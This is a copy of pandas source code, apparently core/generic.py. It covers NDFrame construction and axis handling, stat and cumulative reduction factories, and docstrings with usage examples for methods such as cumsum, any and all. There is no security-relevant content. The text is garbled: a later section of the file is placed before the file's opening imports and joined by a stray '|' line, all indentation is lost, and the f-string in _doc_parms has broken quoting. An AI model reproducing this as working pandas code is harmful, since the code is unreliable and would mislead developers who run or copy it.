# ----------------------------------------------------------------------
# Misc methods
_shared_docs[
"valid_index"
] = """
Return index for %(position)s non-NA/null value.
Returns
-------
scalar : type of index
Notes
-----
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
"""
def _find_valid_index(self, how: str):
"""
Retrieves the index of the first valid value.
Parameters
----------
how : {'first', 'last'}
Use this parameter to change between the first or last valid index.
Returns
-------
idx_first_valid : type of index
"""
idxpos = find_valid_index(self._values, how)
if idxpos is None:
return None
return self.index[idxpos]
@Appender(
_shared_docs["valid_index"] % {"position": "first", "klass": "Series/DataFrame"}
)
def first_valid_index(self):
return self._find_valid_index("first")
@Appender(
_shared_docs["valid_index"] % {"position": "last", "klass": "Series/DataFrame"}
)
def last_valid_index(self):
return self._find_valid_index("last")
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = (
f"{{{", ".join(f"{a} ({i})' for i, a in enumerate(cls._AXIS_ORDERS))}}}"
)
name = cls._constructor_sliced.__name__ if cls._AXIS_LEN > 1 else "scalar"
name2 = cls.__name__
return axis_descr, name, name2
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
**kwargs
Additional keyword arguments to be passed to the function.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_doc_mad = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default None
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
%(name1)s or %(name2)s (if level specified)\n"""
_bool_doc = """
%(desc)s
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default 0
Indicate which axis or axes should be reduced.
* 0 / 'index' : reduce the index, return a Series whose index is the
original column labels.
* 1 / 'columns' : reduce the columns, return a Series whose index is the
original index.
* None : reduce all axes, return a scalar.
bool_only : bool, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
skipna : bool, default True
Exclude NA/null values. If the entire row/column is NA and skipna is
True, then the result will be %(empty_value)s, as for an empty row/column.
If skipna is False, then NA are treated as True, because these are not
equal to zero.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
If level is specified, then, %(name2)s is returned; otherwise, %(name1)s
is returned.
%(see_also)s
%(examples)s"""
_all_desc = """\
Return whether all elements are True, potentially over an axis.
Returns True unless there at least one element within a series or
along a Dataframe axis that is False or equivalent (e.g. zero or
empty)."""
_all_examples = """\
Examples
--------
**Series**
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
>>> pd.Series([]).all()
True
>>> pd.Series([np.nan]).all()
True
>>> pd.Series([np.nan]).all(skipna=False)
True
**DataFrames**
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Specify ``axis='columns'`` to check if row-wise values all return True.
>>> df.all(axis='columns')
0 True
1 False
dtype: bool
Or ``axis=None`` for whether every value is True.
>>> df.all(axis=None)
False
"""
_all_see_also = """\
See Also
--------
Series.all : Return True if all elements are True.
DataFrame.any : Return True if one (or more) elements are True.
"""
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
See Also
--------
core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
%(examples)s"""
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
_any_see_also = """\
See Also
--------
numpy.any : Numpy version of this method.
Series.any : Return whether any element is True.
Series.all : Return whether all elements are True.
DataFrame.any : Return whether any element is True over requested axis.
DataFrame.all : Return whether all elements are True over requested axis.
"""
_any_desc = """\
Return whether any element is True, potentially over an axis.
Returns False unless there at least one element within a series or
along a Dataframe axis that is True or equivalent (e.g. non-zero or
non-empty)."""
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([False, False]).any()
False
>>> pd.Series([True, False]).any()
True
>>> pd.Series([]).any()
False
>>> pd.Series([np.nan]).any()
False
>>> pd.Series([np.nan]).any(skipna=False)
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
Aggregating over the entire DataFrame with ``axis=None``.
>>> df.any(axis=None)
True
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
_shared_docs[
"stat_func_example"
] = """
Examples
--------
>>> idx = pd.MultiIndex.from_arrays([
... ['warm', 'warm', 'cold', 'cold'],
... ['dog', 'falcon', 'fish', 'spider']],
... names=['blooded', 'animal'])
>>> s = pd.Series([4, 2, 0, 8], name='legs', index=idx)
>>> s
blooded animal
warm dog 4
falcon 2
cold fish 0
spider 8
Name: legs, dtype: int64
>>> s.{stat_func}()
{default_output}
{verb} using level names, as well as indices.
>>> s.{stat_func}(level='blooded')
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64
>>> s.{stat_func}(level=0)
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64"""
_sum_examples = _shared_docs["stat_func_example"].format(
stat_func="sum", verb="Sum", default_output=14, level_output_0=6, level_output_1=8
)
_sum_examples += """
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan"""
_max_examples = _shared_docs["stat_func_example"].format(
stat_func="max", verb="Max", default_output=8, level_output_0=4, level_output_1=8
)
_min_examples = _shared_docs["stat_func_example"].format(
stat_func="min", verb="Min", default_output=0, level_output_0=2, level_output_1=0
)
_stat_func_see_also = """
See Also
--------
Series.sum : Return the sum.
Series.min : Return the minimum.
Series.max : Return the maximum.
Series.idxmin : Return the index of the minimum.
Series.idxmax : Return the index of the maximum.
DataFrame.sum : Return the sum over the requested axis.
DataFrame.min : Return the minimum over the requested axis.
DataFrame.max : Return the maximum over the requested axis.
DataFrame.idxmin : Return the index of the minimum over the requested axis.
DataFrame.idxmax : Return the index of the maximum over the requested axis."""
_prod_examples = """
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan"""
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded:: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(
cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
min_count=_min_count_stub,
see_also=see_also,
examples=examples,
)
@Appender(_num_doc)
def stat_func(
self,
axis=None,
skipna=None,
level=None,
numeric_only=None,
min_count=0,
**kwargs,
):
if name == "sum":
nv.validate_sum(tuple(), kwargs)
elif name == "prod":
nv.validate_prod(tuple(), kwargs)
else:
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(
name, axis=axis, level=level, skipna=skipna, min_count=min_count
)
return self._reduce(
f,
name,
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
min_count=min_count,
)
return set_function_name(stat_func, name, cls)
def _make_stat_function(
cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
min_count="",
see_also=see_also,
examples=examples,
)
@Appender(_num_doc)
def stat_func(
self, axis=None, skipna=None, level=None, numeric_only=None, **kwargs
):
if name == "median":
nv.validate_median(tuple(), kwargs)
else:
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
return self._reduce(
f, name, axis=axis, skipna=skipna, numeric_only=numeric_only
)
return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(desc=desc, name1=name1, name2=name2, axis_descr=axis_descr)
@Appender(_num_ddof_doc)
def stat_func(
self, axis=None, skipna=None, level=None, ddof=1, numeric_only=None, **kwargs
):
nv.validate_stat_ddof_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(
name, axis=axis, level=level, skipna=skipna, ddof=ddof
)
return self._reduce(
f, name, axis=axis, numeric_only=numeric_only, skipna=skipna, ddof=ddof
)
return set_function_name(stat_func, name, cls)
def _make_cum_function(
cls,
name,
name1,
name2,
axis_descr,
desc,
accum_func,
accum_func_name,
mask_a,
mask_b,
examples,
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
accum_func_name=accum_func_name,
examples=examples,
)
@Appender(_cnum_doc)
def cum_func(self, axis=None, skipna=True, *args, **kwargs):
skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
if axis is None:
axis = self._stat_axis_number
else:
axis = self._get_axis_number(axis)
if axis == 1:
return cum_func(self.T, axis=0, skipna=skipna, *args, **kwargs).T
def na_accum_func(blk_values):
# We will be applying this function to block values
if blk_values.dtype.kind in ["m", "M"]:
# GH#30460, GH#29058
# numpy 1.18 started sorting NaTs at the end instead of beginning,
# so we need to work around to maintain backwards-consistency.
orig_dtype = blk_values.dtype
# We need to define mask before masking NaTs
mask = isna(blk_values)
if accum_func == np.minimum.accumulate:
# Note: the accum_func comparison fails as an "is" comparison
y = blk_values.view("i8")
y[mask] = np.iinfo(np.int64).max
changed = True
else:
y = blk_values
changed = False
result = accum_func(y.view("i8"), axis)
if skipna:
np.putmask(result, mask, iNaT)
elif accum_func == np.minimum.accumulate:
# Restore NaTs that we masked previously
nz = (~np.asarray(mask)).nonzero()[0]
if len(nz):
# everything up to the first non-na entry stays NaT
result[: nz[0]] = iNaT
if changed:
# restore NaT elements
y[mask] = iNaT # TODO: could try/finally for this?
if isinstance(blk_values, np.ndarray):
result = result.view(orig_dtype)
else:
# DatetimeArray
result = type(blk_values)._from_sequence(result, dtype=orig_dtype)
elif skipna and not issubclass(
blk_values.dtype.type, (np.integer, np.bool_)
):
vals = blk_values.copy().T
mask = isna(vals)
np.putmask(vals, mask, mask_a)
result = accum_func(vals, axis)
np.putmask(result, mask, mask_b)
else:
result = accum_func(blk_values.T, axis)
# transpose back for ndarray, not for EA
return result.T if hasattr(result, "T") else result
result = self._data.apply(na_accum_func)
d = self._construct_axes_dict()
d["copy"] = False
return self._constructor(result, **d).__finalize__(self)
return set_function_name(cum_func, name, cls)
def _make_logical_function(
cls, name, name1, name2, axis_descr, desc, f, see_also, examples, empty_value
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
see_also=see_also,
examples=examples,
empty_value=empty_value,
)
@Appender(_bool_doc)
def logical_func(self, axis=0, bool_only=None, skipna=True, level=None, **kwargs):
nv.validate_logical_func(tuple(), kwargs, fname=name)
if level is not None:
if bool_only is not None:
raise NotImplementedError(
"Option bool_only is not implemented with option level."
)
return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
return self._reduce(
f,
name,
axis=axis,
skipna=skipna,
numeric_only=bool_only,
filter_type="bool",
)
return set_function_name(logical_func, name, cls)
| import collections
from datetime import timedelta
import functools
import gc
import json
import operator
import pickle
import re
from textwrap import dedent
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
FrozenSet,
Hashable,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
)
import warnings
import weakref
import numpy as np
from pandas._config import config
from pandas._libs import Timestamp, iNaT, lib
from pandas._typing import (
Axis,
FilePathOrBuffer,
FrameOrSeries,
JSONSerializable,
Label,
Level,
Renamer,
)
from pandas.compat import set_function_name
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
Appender,
Substitution,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_bool_kwarg,
validate_fillna_kwargs,
validate_percentile,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_object,
ensure_str,
is_bool,
is_bool_dtype,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_dict_like,
is_extension_array_dtype,
is_float,
is_integer,
is_list_like,
is_number,
is_numeric_dtype,
is_object_dtype,
is_period_arraylike,
is_re_compilable,
is_scalar,
is_timedelta64_dtype,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCDataFrame, ABCSeries
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas.core import missing, nanops
import pandas.core.algorithms as algos
from pandas.core.base import PandasObject, SelectionMixin
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.indexes.api import (
Index,
InvalidIndexError,
MultiIndex,
RangeIndex,
ensure_index,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import Period, PeriodIndex
import pandas.core.indexing as indexing
from pandas.core.internals import BlockManager
from pandas.core.missing import find_valid_index
from pandas.core.ops import _align_method_FRAME
from pandas.io.formats import format as fmt
from pandas.io.formats.format import DataFrameFormatter, format_percentiles
from pandas.io.formats.printing import pprint_thing
from pandas.tseries.frequencies import to_offset
if TYPE_CHECKING:
from pandas.core.resample import Resampler
# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs: Dict[str, str] = dict()
_shared_doc_kwargs = dict(
axes="keywords for axes",
klass="Series/DataFrame",
axes_single_arg="int or labels for object",
args_transpose="axes to permute (int or label for object)",
optional_by="""
by : str or list of str
Name or list of names to sort by""",
)
def _single_replace(self, to_replace, method, inplace, limit):
"""
Replaces values in a Series using the fill method specified when no
replacement value is given in the replace method
"""
if self.ndim != 1:
raise TypeError(
f"cannot replace {to_replace} with method {method} on a "
f"{type(self).__name__}"
)
orig_dtype = self.dtype
result = self if inplace else self.copy()
fill_f = missing.get_fill_func(method)
mask = missing.mask_missing(result.values, to_replace)
values = fill_f(result.values, limit=limit, mask=mask)
if values.dtype == orig_dtype and inplace:
return
result = pd.Series(values, index=self.index, dtype=self.dtype).__finalize__(self)
if inplace:
self._update_inplace(result._data)
return
return result
bool_t = bool # Need alias because NDFrame has def bool:
class NDFrame(PandasObject, SelectionMixin, indexing.IndexingMixin):
"""
N-dimensional analogue of DataFrame. Store multi-dimensional in a
size-mutable, labeled data structure
Parameters
----------
data : BlockManager
axes : list
copy : bool, default False
"""
_internal_names: List[str] = [
"_data",
"_cacher",
"_item_cache",
"_cache",
"_is_copy",
"_subtyp",
"_name",
"_index",
"_default_kind",
"_default_fill_value",
"_metadata",
"__array_struct__",
"__array_interface__",
]
_internal_names_set: Set[str] = set(_internal_names)
_accessors: Set[str] = set()
_deprecations: FrozenSet[str] = frozenset(["get_values"])
_metadata: List[str] = []
_is_copy = None
_data: BlockManager
_attrs: Dict[Optional[Hashable], Any]
_typ: str
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data: BlockManager,
copy: bool = False,
attrs: Optional[Mapping[Optional[Hashable], Any]] = None,
):
# copy kwarg is retained for mypy compat, is not used
object.__setattr__(self, "_is_copy", None)
object.__setattr__(self, "_data", data)
object.__setattr__(self, "_item_cache", {})
if attrs is None:
attrs = {}
else:
attrs = dict(attrs)
object.__setattr__(self, "_attrs", attrs)
@classmethod
def _init_mgr(cls, mgr, axes=None, dtype=None, copy=False):
""" passed a manager and a axes dict """
for a, axe in axes.items():
if axe is not None:
mgr = mgr.reindex_axis(
axe, axis=cls._get_block_manager_axis(a), copy=False
)
# make a copy if explicitly requested
if copy:
mgr = mgr.copy()
if dtype is not None:
# avoid further copies if we can
if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
mgr = mgr.astype(dtype=dtype)
return mgr
# ----------------------------------------------------------------------
@property
def attrs(self) -> Dict[Optional[Hashable], Any]:
"""
Dictionary of global attributes on this object.
.. warning::
attrs is experimental and may change without warning.
"""
if self._attrs is None:
self._attrs = {}
return self._attrs
@attrs.setter
def attrs(self, value: Mapping[Optional[Hashable], Any]) -> None:
self._attrs = dict(value)
@classmethod
def _validate_dtype(cls, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == "V":
raise NotImplementedError(
"compound dtypes are not implemented "
f"in the {cls.__name__} constructor"
)
return dtype
# ----------------------------------------------------------------------
# Construction
@property
def _constructor(self: FrameOrSeries) -> Type[FrameOrSeries]:
"""
Used when a manipulation result has the same dimensions as the
original.
"""
raise AbstractMethodError(self)
@property
def _constructor_sliced(self):
"""
Used when a manipulation result has one lower dimension(s) as the
original, such as DataFrame single columns slicing.
"""
raise AbstractMethodError(self)
@property
def _constructor_expanddim(self):
"""
Used when a manipulation result has one higher dimension as the
original, such as Series.to_frame()
"""
raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
_AXIS_ALIASES = {"rows": 0}
_AXIS_IALIASES = {0: "rows"}
_stat_axis_number = 0
_stat_axis_name = "index"
_ix = None
_AXIS_ORDERS: List[str]
_AXIS_NUMBERS: Dict[str, int]
_AXIS_NAMES: Dict[int, str]
_AXIS_REVERSED: bool
_info_axis_number: int
_info_axis_name: str
_AXIS_LEN: int
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
@classmethod
def _construct_axes_from_arguments(
cls, args, kwargs, require_all: bool = False, sentinel=None
):
"""
Construct and returns axes if supplied in args/kwargs.
If require_all, raise if all axis arguments are not supplied
return a tuple of (axes, kwargs).
sentinel specifies the default parameter when an axis is not
supplied; useful to distinguish when a user explicitly passes None
in scenarios where None has special meaning.
"""
# construct the args
args = list(args)
for a in cls._AXIS_ORDERS:
# look for a argument by position
if a not in kwargs:
try:
kwargs[a] = args.pop(0)
except IndexError as err:
if require_all:
raise TypeError(
"not enough/duplicate arguments specified!"
) from err
axes = {a: kwargs.pop(a, sentinel) for a in cls._AXIS_ORDERS}
return axes, kwargs
@classmethod
def _get_axis_number(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in cls._AXIS_NAMES:
return axis
else:
try:
return cls._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
@classmethod
def _get_axis_name(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, str):
if axis in cls._AXIS_NUMBERS:
return axis
else:
try:
return cls._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
def _get_axis(self, axis):
name = self._get_axis_name(axis)
return getattr(self, name)
@classmethod
def _get_block_manager_axis(cls, axis):
"""Map the axis to the block_manager axis."""
axis = cls._get_axis_number(axis)
if cls._AXIS_REVERSED:
m = cls._AXIS_LEN - 1
return m - axis
return axis
def _get_axis_resolvers(self, axis: str) -> Dict[str, ABCSeries]:
# index or columns
axis_index = getattr(self, axis)
d = dict()
prefix = axis[0]
for i, name in enumerate(axis_index.names):
if name is not None:
key = level = name
else:
# prefix with 'i' or 'c' depending on the input axis
# e.g., you must do ilevel_0 for the 0th level of an unnamed
# multiiindex
key = f"{prefix}level_{i}"
level = i
level_values = axis_index.get_level_values(level)
s = level_values.to_series()
s.index = axis_index
d[key] = s
# put the index/columns itself in the dict
if isinstance(axis_index, MultiIndex):
dindex = axis_index
else:
dindex = axis_index.to_series()
d[axis] = dindex
return d
def _get_index_resolvers(self) -> Dict[str, ABCSeries]:
from pandas.core.computation.parsing import clean_column_name
d: Dict[str, ABCSeries] = {}
for axis_name in self._AXIS_ORDERS:
d.update(self._get_axis_resolvers(axis_name))
return {clean_column_name(k): v for k, v in d.items() if not isinstance(k, int)}
def _get_cleaned_column_resolvers(self) -> Dict[str, ABCSeries]:
"""
Return the special character free column resolvers of a dataframe.
Column names with special characters are 'cleaned up' so that they can
be referred to by backtick quoting.
Used in :meth:`DataFrame.eval`.
"""
from pandas.core.computation.parsing import clean_column_name
if isinstance(self, ABCSeries):
return {clean_column_name(self.name): self}
return {
clean_column_name(k): v for k, v in self.items() if not isinstance(k, int)
}
@property
def _info_axis(self):
return getattr(self, self._info_axis_name)
@property
def _stat_axis(self):
return getattr(self, self._stat_axis_name)
@property
def shape(self) -> Tuple[int, ...]:
"""
Return a tuple of axis dimensions
"""
return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
@property
def axes(self) -> List[Index]:
"""
Return index label(s) of the internal NDFrame
"""
# we do it this way because if we have reversed axes, then
# the block manager shows then reversed
return [self._get_axis(a) for a in self._AXIS_ORDERS]
@property
def ndim(self) -> int:
"""
Return an int representing the number of axes / array dimensions.
Return 1 if Series. Otherwise return 2 if DataFrame.
See Also
--------
ndarray.ndim : Number of array dimensions.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.ndim
1
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.ndim
2
"""
return self._data.ndim
@property
def size(self) -> int:
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size : Number of elements in the array.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
@property
def _selected_obj(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
@property
def _obj_with_exclusions(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
"""
Assign desired index to given axis.
Indexes for%(extended_summary_sub)s row labels can be changed by assigning
a list-like or Index.
.. versionchanged:: 0.21.0
The signature is now `labels` and `axis`, consistent with
the rest of pandas API. Previously, the `axis` and `labels`
arguments were respectively the first and second positional
arguments.
Parameters
----------
labels : list-like, Index
The values for the new index.
axis : %(axes_single_arg)s, default 0
The axis to update. The value 0 identifies the rows%(axis_description_sub)s.
inplace : bool, default False
Whether to return a new %(klass)s instance.
Returns
-------
renamed : %(klass)s or None
An object of type %(klass)s if inplace=False, None otherwise.
See Also
--------
%(klass)s.rename_axis : Alter the name of the index%(see_also_sub)s.
"""
if inplace:
setattr(self, self._get_axis_name(axis), labels)
else:
obj = self.copy()
obj.set_axis(labels, axis=axis, inplace=True)
return obj
def _set_axis(self, axis: int, labels: Index) -> None:
labels = ensure_index(labels)
self._data.set_axis(axis, labels)
self._clear_item_cache()
def swapaxes(self: FrameOrSeries, axis1, axis2, copy=True) -> FrameOrSeries:
"""
Interchange axes and swap values axes appropriately.
Returns
-------
y : same as input
"""
i = self._get_axis_number(axis1)
j = self._get_axis_number(axis2)
